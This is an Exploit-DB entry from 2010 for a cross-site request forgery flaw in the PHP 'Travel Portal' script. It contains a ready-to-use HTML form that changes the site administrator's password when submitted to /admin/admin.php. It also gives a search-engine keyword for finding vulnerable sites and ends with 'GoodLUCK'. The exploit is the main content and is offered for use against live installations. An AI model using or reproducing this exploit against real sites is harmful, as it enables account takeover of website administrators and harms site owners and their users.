Travel Portal Script - Cross-Site Request Forgery (Admin Password Change)

EDB-ID:

15280

CVE:

N/A


Author:

KnocKout

Type:

webapps


Platform:

PHP

Date:

2010-10-19


=====================================================
Travel PORTAL <= Admin Password Change (CSRF) Exploit
=====================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Travel PORTAL
|~Price : 299 Euro :)
|~Version : N/A
|~Software: http://www.tourismscripts.com
|~Vulnerability Style : CSRF
|~Vulnerability Dir : /admin
|~Google Keyword : "For Owners, Agents, Hotels, Hostels, Guest House "
|[~]Date : "18.10.2010"
|[~]Tested on : (L):Vista (R):Demos.
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
############################################################
the target can be changed according to
<form method="post" action="http://VICTIM/admin/admin.php">
############################################################

    ~~~~~~~~ Explotation| Exploit.HTML~~~~~~~~~~~
    
========(CSRF) Html Exploit=========

<title>Exploited by KnocKout</title>
</table>
<br>
<h3>Travel Portal - Remote Admin Password Change (CSRF) Exploited by KnocKout</h3>
<table>

<tr>
<form method="post" action="http://server/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<td align=right>Admin Name:</td><td align=left>admin<td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input type="password" name="password" size="40" maxlength="40" ><td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</form>
</tr>
</table>

========(CSRF) Html Exploit=========
    
     GoodLUCK.